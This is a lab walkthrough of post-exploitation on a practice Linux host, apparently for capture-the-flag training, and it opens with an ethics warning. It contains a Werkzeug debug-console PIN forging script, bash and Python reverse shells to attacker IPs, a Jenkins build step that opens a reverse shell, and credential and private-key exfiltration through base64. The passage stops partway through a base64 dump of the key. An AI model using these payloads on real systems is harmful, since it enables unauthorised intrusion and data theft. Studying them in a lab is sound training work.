Skip to main content

Post Exploitation

Ethical Exploitation Warning

Post-exploitation activities in this lab (e.g., privilege escalation, credential harvesting, lateral movement, persistence mechanisms, and data access) are explicitly authorized only within the defined lab environment.

In real-world systems, these actions can result in permanent data loss, service disruption, and legal consequences if performed without authorization. Ethical security professionals minimize impact, avoid unnecessary damage, and act strictly within scope.

This lab exists to teach how attackers operate after initial compromise so defenses can be designed and improved—not to normalize reckless behavior.

Post Enumeration

Post-enumeration is the critical step that takes place after gaining initial access to a remote server but before attempting privilege escalation. Once inside, we don’t rush into privesc blindly; instead, we carefully gather detailed information about the system to understand its environment, configurations, and potential weaknesses.

Key post-enumeration tasks include:

  • Checking the current user context and its permissions
  • Identifying operating system version and patch levels
  • Listing running processes and services
  • Examining installed software and kernel versions
  • Searching for misconfigurations, sensitive files, or stored credentials
  • Reviewing network connections and identifying trust relationships

This phase ensures we have a clear picture of the system’s landscape and helps us choose the right privilege escalation path instead of using random exploits, reducing the risk of detection or crashing the system.

Popular Post-Enumeration Tools

Linux:

A popular script from the PEAS suite that automates local enumeration on Linux systems, looking for privilege escalation vectors (kernel exploits, SUID files, configs, misconfigurations, etc.).

  • Pros:
    • Fast and lightweight
    • Covers a wide range of checks (kernel, SUID, sudo, crons, passwords, services)
    • Color-coded, easy-to-read output
  • Cons:
    • Large output can be overwhelming
    • Can trigger alarms on defensive systems (e.g., EDR/AV)

Windows

Part of the PEAS suite, WinPEAS is an automated script that scans Windows systems for common local privilege escalation vectors like misconfigured services, registry settings, permissions, tokens, and stored credentials.

  • Pros:
    • Very comprehensive (broad range of checks)
    • Color-coded, easy-to-read output
    • Active development with frequent updates
  • Cons:
    • Generates large, sometimes overwhelming output
    • Can trigger antivirus/EDR alerts

Summary Tip

  • If you want all-in-one scanning: LinPEAS / WinPEAS
  • If you want exploit suggestions: Windows Exploit Suggester or Sherlock
  • If you want PowerShell integration: PowerUp
  • If you want modular C# tooling: Seatbelt

Manual Info Gathering - Linux

Enumeration is the key to privilege escalation. Several helper scripts exist to assist with enumeration. Still, it is also important to understand what pieces of information to look for and to be able to perform your enumeration manually. When you gain initial shell access to the host, it is important to check several key details.

// Operating system and version
cat /etc/os-release
// List applications installed by dpkg
dpkg -l
// Current user's PATH and environment variable
echo $PATH
// Kernel version
env
uname -a
// Available shells
cat /etc/shells
// Network information
route
netstat -plant
ss -plant
arp -a
// List Current Processes
ps au
ps aux
ps aux | grep root
// Home Directory Contents
ls /home
// User's Home Directory Contents
ls -la /home/james
// SSH Directory Contents
ls -l ~/.ssh
// Bash History
history
// Sudo - List User's Privileges
sudo -l
// Passwd, groups, etc
cat /etc/passwd
cat /etc/group
getent group sudo
// Cron Jobs
cat /etc/cron*
crontab -l
// Find Writable Directories
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null
// Find Writable Files
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
// Find all hidden files
find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null | grep 'james'
// Find all hidden directories
find / -type d -name ".*" -ls 2>/dev/null
// Configuration files
find / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/null
// Mounted file systems and list drives
mount
cat /etc/fstab

Running LinPEAS

For this box, we’ll use LinPEAS to automate our post-enumeration on the compromised Linux server.

// Step 1: On the attacker machine, download the script directly from its GitHub repository
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
// Step 2: Set up a simple Python HTTP server on the attacker machine
python3 -m http.server 8000
// Step 3: Download the script on the target machine and execute
wget http://<attacker-ip>:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Output of linpeas.sh

<SNIP>
╔══════════╣ Users with console
ashley:x:1007:1007:,,,:/home/ashley:/bin/bash
gitea:x:104:113::/var/lib/gitea:/bin/bash
james:x:1004:1004:,,,:/home/james:/bin/bash
jma:x:1000:1000:jma,,,:/home/jma:/bin/bash
kevin:x:1006:1006:,,,:/home/kevin:/bin/bash
kim:x:1008:1008:,,,:/home/kim:/bin/bash
lily:x:1005:1005:,,,:/home/lily:/bin/bash
myflask:x:999:994::/opt/Flask_SPA:/bin/bash
root:x:0:0:root:/root:/bin/bash

<SNIP>
╔══════════╣ Analyzing Wordpress Files (limit 70)
-rw-rw-rw- 1 www-data www-data 3201 Aug 22 06:45 /var/www/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress_db' );
define( 'DB_USER', 'wp_user' );
define( 'DB_PASSWORD', 'WpPassword123!' );
define( 'DB_HOST', 'localhost' );

<SNIP>
╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
Group administrator:
/home/kim
/home/kim/.local
/home/kim/.local/share
/home/kim/.local/share/nano
/home/kim/.profile
/home/kim/admin_monitor.py
/home/kim/.bash_logout
/home/kim/.bashrc

<SNIP>
╔══════════╣ Searching passwords in config PHP files
/var/www/joomla39/configuration.php:	public $password = 'JoomlaPassword123!';
<SNIP
/var/www/qdpm/core/cache/qdPM/prod/config/config_databases.yml.php:  'password' => 'QdpmPass123%21',

After executing LinPEAS, we identified several interesting items, including:

  • Potential privilege escalation vectors (e.g., SUID binaries,)
  • Misconfigured permissions or sensitive files
  • Service configurations that may be exploitable

These findings will guide our next steps as we prepare to attempt privilege escalation.

Werkzeug PIN Bypass - Continuation

After reading the Werkzeug documentation, the PIN exploit was developed by reversing the algorithm generating the console PIN. Reviewing the __init__.py of the target machine, where the exploit script is based, noticed that the server script is using SHA1 instead of MD5.

cat /opt/myflask/venv/lib/python3.11/site-packages/werkzeug/debug/__init__.py | grep hashlib

import hashlib
    return hashlib.sha1(f"{pin} added salt".encode("utf-8", "replace")).hexdigest()[:12]
    h = hashlib.sha1()

Let's again update the script and use sha1 instead of md5.

import hashlib
from itertools import chain
import os
import getpass

probably_public_bits = [
        'flask-admin', # username
        'flask.app', # modname
        'Flask',
        '/opt/myflask/venv/lib/python3.11/site-packages/flask/app.py'
]

private_bits = [
        '8796753406199', # enp0s3 MAC
        'ad4b9e2bc71a466398b19d0c256a378c' #machine-id
]

h = hashlib.sha1()

for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None :
    for group_size in 5 , 4 , 3 :
        if len (num)% group_size == 0 :
            rv = '-' .join (num[x: x + group_size].rjust(group_size, '0')
            for x in range (0, len(num), group_size))
            break
        else :
            rv = num

print(rv)

Our new pin is 130-883-207

PIN Correct

The PIN worked, and we have now an access to an interactive console.

Werkzeug Console

Exploitation of Debug Console

As stated in the page, we can execute Python expressions in the context of the application. Let's use revshell to generate a python shell

Rev Shell 2

Setup a listener then execute the script in the console.

export RHOST="192.168.2.25";export RPORT=4443;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Executing the script resulted to an invalid syntax error

Console Error

Let's use a simple bash shell insted.

Revshell 3

import os; os.system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.2.25/4443 0>&1'")

The script worked. We have now a new shell in the context of the flask-admin user.

Listener Werkzeug

Jenkins Exploitation

Inside the home directory of the flask-admin user we discovered a pcap file named capture. Let's download the file and open it in Wireshark.

Pcap

From the pcap file, we discovered the login credential for the user ashley. Let's use this to try to log in in Jenkins

Once we have gained access to a Jenkins application, a quick way of achieving command execution on the underlying server is via the Script Console. The script console allows us to run arbitrary Groovy scripts within the Jenkins controller runtime. This can be abused to run operating system commands on the underlying server.

Let's create a job by choosing New Item and then Freestyle project.

Jenkins 1

Under Build Triggers click on Add build step then select Execute shell. Input id command and click on save .

Jenkins 2

Now click on Build Now option.

Jenkins 3

Under Build History click on the build number that is succeeded. Then, click on Console Output shows the command output. The id command executed without problem and the uid is ashley user.

Jenkins 4

Navigate to project which we created earlier and click on configure.

Jenkins 5

Reverse shell as ashley

Let's generate a new command using revshell.com.

Jenkins 6

This Python one-liner is a reverse shell that connects the target system back to an attacker’s listener, providing remote command execution. It begins by importing three standard libraries: socket for network connections, subprocess for executing system-level commands, and os for handling low-level operations like file descriptor manipulation. The command then creates a TCP connection to the attacker’s machine at IP 10.0.0.12 on port 1234 using the socket.create_connection() method, which simplifies the connection process compared to manually setting up a socket.

Change the id command with below code.

Jenkins 7

Prepare the listener on our Kali. Save the job and click on Build Now button.

nc -nlvp 8001

Jenkins 8

We have another reverse shell as ashley.

Jenkins 9

Stabilizing the Shell

Let's upgrade our shell using python

python3 -c 'import pty; pty.spawn("/bin/bash")'

1. Background the Process Once the shell is spawned, you may notice that the interaction is not fully stable. Press CTRL + Z to temporarily background the process. This allows you to regain control of your host machine while keeping the spawned shell active on the target.

2. Adjust Terminal Line Settings and Resume the Shell To improve interactivity, adjust the terminal settings on your host machine by running:

stty raw -echo
fg

This places the shell back in the foreground with improved responsiveness.

3. Set the Terminal Emulator to xterm For optimal compatibility, set the terminal type on the target machine:

export TERM=xterm

This ensures that applications running inside the shell interpret terminal features correctly.

Explanation

  • The pty module in Python is key to creating and managing pseudo-terminals, enabling more interactive control over spawned processes.
  • The pty.spawn() function links the target’s controlling terminal with the current process’s input and output, creating a smoother shell session.
  • The stty command modifies terminal settings:
    • stty raw activates raw mode, allowing input to be processed one character at a time.
    • stty -echo disables command echoing, preventing typed characters from being displayed twice.
  • The export TERM=xterm command sets the terminal emulator to xterm, ensuring compatibility with features such as clear screen, cursor movement, and text formatting.

In the home directory of ashley, we saw an interesting file named jenkins_secret.tar.gz.enc. It's an encrypted file. Before proceeding with post enumeration let's use base64 encoding to download the file.

ashley@keym4ker:~$ ls
// terminal output
jenkins_home  jenkins_secret.tar.gz.enc    

ashley@keym4ker:~$ file jenkins_secret.tar.gz.enc
// terminal output
file jenkins_secret.tar.gz.enc
jenkins_secret.tar.gz.enc: openssl enc'd data with salted password

Copy the base64 encoded content of each file to our Kali machine for decoding.

ashley@keym4ker:~$ md5sum jenkins_secret.tar.gz.enc
// terminal output
md5sum jenkins_secret.tar.gz.enc
0f40ac264c4cfbbcdca4ed951d1df3df  jenkins_secret.tar.gz.enc

ashley@keym4ker:~$ cat jenkins_secret.tar.gz.enc | base64 -w  0;echo
// terminal output
cat jenkins_secret.tar.gz.enc | base64 -w  0;echo
"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"

Decoding the file

echo "U2FsdGVkX1/SmkfuKYqm6/VyeFKjAo..." | base64 -d > jenkins_secret.tar.gz.enc

Re-computing the md5sum to check for file integrity.

Jenkins Md5sum

The md5sum hashes matches, confirming the file was transferred successfuly in our Kali.

Post Enumeration Gathering as ashley

The md5sum hashes matches, confirming the encrypted file was transferred successfully in our Kali. Since the file was encrypted, let's continue the post-enumeration on the target machine.

ashley@keym4ker:~$ for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done

// terminal output
File extension:  .conf
/run/tmpfiles.d/static-nodes.conf
<SNIP>

File extension:  .config
/var/www/osticket/upload/web.config
/etc/manpath.config

File extension:  .cnf
/etc/alternatives/my.cnf

<SNIP>

Searching for credentials in configuration files

ashley@keym4ker:~$ for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done
// terminal output
File:  /usr/share/mysql/wsrep.cnf
File:  /usr/share/ssl-cert/ssleay.cnf
<SNIP>
File:  /etc/alternatives/my.cnf

Again nothing standout, let's search for databases. No databases found.

ashley@keym4ker:~$ for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done
// terminal output
DB File extension:  .sql
/var/www/osticket/upload/setup/inc/streams/core/install-mysql.sql

<SNIP>
/var/www/joomla39/administrator/components/com_banners/sql/install.mysql.utf8.sql

<SNIP>
/var/www/keym4ker/schema.sql
/var/www/qdpm/install/install.sql

<SNIP>

DB File extension:  .db
/var/www/qdpm/core/data/sandbox.db
<SNIP>

Searching for scripts. A few was discovered but let's move on

ashley@keym4ker:~$ for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done
// terminal output
File extension:  .py
/opt/myflask/app.py

File extension:  .pyc
/opt/myflask/__pycache__/app.cpython-39.pyc

File extension:  .pl
/var/www/osticket/upload/setup/scripts/automail.pl

File extension:  .jar
/tmp/winstone8390624141246507573.jar

File extension:  .c
/usr/include/X11/Xtrans/Xtransutil.c

File extension:  .sh
/opt/tomcat/bin/startup.sh

Lastly, the tester searched for common files, and found an interesting private.pem located in /keys directory.

ashley@keym4ker:~$ for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp* .gz .gzip .zip .7z .tar* .rar .war .jar .ear, pem");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done
// terminal output
File extension:  .xls

File extension:  .xls*

File extension:  .xltx

File extension:  .csv

File extension:  .od*

File extension:  .doc

File extension:  .doc*

File extension:  .pdf
/var/www/wordpress/wp-content/plugins/thecartpress/plugins/authorize.net/anet_php_sdk/License.pdf

File extension:  .pot
/var/www/wp/wp-content/plugins/better-search-replace/languages/better-search-replace.pot

File extension:  .pp*

File extension:  .gz

File extension:  .gzip

File extension:  .zip
/srv/ftp/secret.zip

File extension:  .7z

File extension:  .tar*
/home/ashley/jenkins_secret.tar.gz.enc

File extension:  .rar

File extension:  .war
/opt/tomcat/webapps/revshell.war
/opt/tomcat/webapps/backup.war

File extension:  .jar
/home/ashley/jenkins_home/war/executable/winstone.jar


File extension:  .ear,

File extension:  pem
/keys/private.pem

Discovery of /keys directory

The keys directory contain two files. From the looks of it, these key files are used by the user ashley to encrypt the tar.gz file we discovered earlier using public key cryptography.

ashley@keym4ker:~$ ls /keys
// terminal output
key.bin.enc  private.pem  encryption.txt

Let's transfer both files to our machine using base64.

ashley@keym4ker:/keys$ cat key.bin.enc | base64 -w 0;echo
// terminal output
cat key.bin.enc | base64 -w 0;echo
fq/+nFoBEW8Y3vEDOEaiRsS8uAFKGJ4uN7ykSXaInjBzKI/IJLBrE5zuL7dVzAg7dYDW7ZbKWTKmI+O+ZbI814FWClHUglat8YW0mPKnTek0u2hSBgVxKV1oxTQW2DBUiqNH2ff5/q1hq1e1KdwdSG7JzlciaqnRI+ymABw//5NDVct3PGLnYmph0uuTk6sysErj1Czmq+9c4IIpz66caD6hTPi6C041oFITL3jIgkcy9Vo05hwCKhOlqVvSOWBecLo0Ehsvgt6Mw4EdlSiO/5JezygN5GUyee31RcqDbM6geJaptqPxalilFD15JsQTrJ7Uzj2KMpNW1Kraoqswww==

ashley@keym4ker:/keys$ cat private.pem | base64 -w 0;echo
// terminal output
cat private.pem | base64 -w 0;echo
LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2Z0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQktnd2dnU2tBZ0VBQW9JQkFRRGhIOG51UWhBQmJpRUEKazlpZ0tPUmVPems0dHVFR3JIa1MrNmo0R3pXb21Vem9ZTlo0MVM3NFJITTJDcE82dCtEcmlzUGlCQkc0Zk9GbgpYRkJjeDV4MTE0OTZlSndkYk4xeUs4bE10UkhrUks3RVlYdGtCQzhHT1FDb254UDdNc1V2MmxCbHF1VWdyQ2xkClhPaGNlN1NldFFlZWJnY0JpT2RTckgxTktRajdlUmg3Z2VOcGY2NGZrazJ4VkdadnAxTTI5R2VoL2FWRjdvLzQKM2RaSWhyT0hMRk1lOWdxWUVUS0lNODJ0a2Zpa0xBZTFIc2tFQlNIVENvWnRqdk5Pa0RKTnQyMExwdW5ETHlHdAp6cnp6azB1SVN1OWNGYVc2UVNQL21IcktPTzk2ZVRaTWI2WUNIMDFxWEhEUnpXbVc0MlV2SGhERndmOFpFZDlRCmJXWUxKd2lOQWdNQkFBRUNnZ0VBTjd0M2Nja2dEa0tWMy84NkMxaGtST0hUaGpOY0hSdFlzL2JpZTEyOUdIcXYKTy80eFNtTzRoNVRta3RQbWc3eWU3YUVDWW5OUWNjUlV4eEpuQUxrWUJtSnhya2VxbW14SG5FcXp3STQ1R2pKWQpzOXhRUUUvNjFrY0pYelZXcklNQ3B4aWNlN2JsbDRPWGovbit1bHFUdWhDbURMWS9mTVZJUTBMWm1GOFd6cTVTCm5zRE5PN29GSGw5MFdpelFaeXFPMEo0aVNEbndYLzQyWG5sQitZMFQyNUNMUGoyWDF6MlRNOVJGbHNqK0NGbFIKeUtPL29nWHJ0UzVsU2VDUWUvSjJUMWdjYXkvU3dEMGlMNTUzSldYMkxjSlJGS0h6bW5UY2hrK3FkeE1FbEN3SwpLeEMzYmxiOVhwZlh1VzFMK1hKSnRkVTZJa2tnNm9kSW0yL0JTN25VTHdLQmdRRHlvUy8ycUxUTUVSWldMUXdkCmtwOGpVeWc1L2JvNTYwUjJiZkRWQjRnengrN2hzeUVJWWpteUZ0TU8rT0FiUXFqV2NucVRpTmF5cVhoTWFTRzcKZ0ZqZFNWUDVzMkhLTS9xZ0JCaFJBSzJuRGt5RVNhZUtrNkdFblJvZWcxMFhzOTVpVkg2bE5uSFBnSVU2dDFJQwpFcEZhemdEdWxxdk1URlprMjNuckszcUlid0tCZ1FEdGg2WTAybDJhVkNkTm5saVRKajdPRlZmY0o3NDA5VjlQCnRTdkg2TmlicmttV2RQNS9TRFdkTjNpSVVPcmdNU2REb0pRd2Q1bEtpK2prSDBTellpWTVXamVyTGp0ampHWDUKUHJrdHduUjhLS0dxanRvUFAxTlRVRGdOOUxVc3k3c2hHOFRBaDBsZGl0V1d5bDJueFh0aXl2azB4MkN2b1RReQp4V3FRdWpha3d3S0JnR3ZzRktpVHJDL2xIZGxoR2pXQlJYWHlCRCtmUTVtRnM2TTJEZHpFQitwNGNTSkZpbGp2ClVCaU9ISDFaYUYzWHpiL3RsZVpRQktmZHg5dTlHN3NLUVB6VkpCdzZsVEhhNHcwUUpUektuM05pWWRpcDVuTTIKYmE3T0xwTUovWHVRajBlUHEvR1RBUmE2WlFpVUNFOVJzUVFDQTlvY2ZQaFhzRW9XY2VtUUltWFRBb0dCQU1lUApvU2Rra3lHM05ESTFLQ3V4QlRFMW8xUjNHNG40NFRQaGZiLytOQVpRSHNsRzBBNzJCdjFvZmw3Z3hRVElwemxkCkwwT3RKK0FHdmdyeTdsQmIxTXQ0cmE2bk1BUktEOTZoUVFsZUIybk01VTZicUQ4Sk1DT2VFUXBBbnZyY3pBSmMKQnlqT1FPaFRYWEhMNFhXMEtCN3Zjd0pSeER5cWptVmRrVk80NzNIckFvR0JBSm5iVXFlaEExQ0VuOTc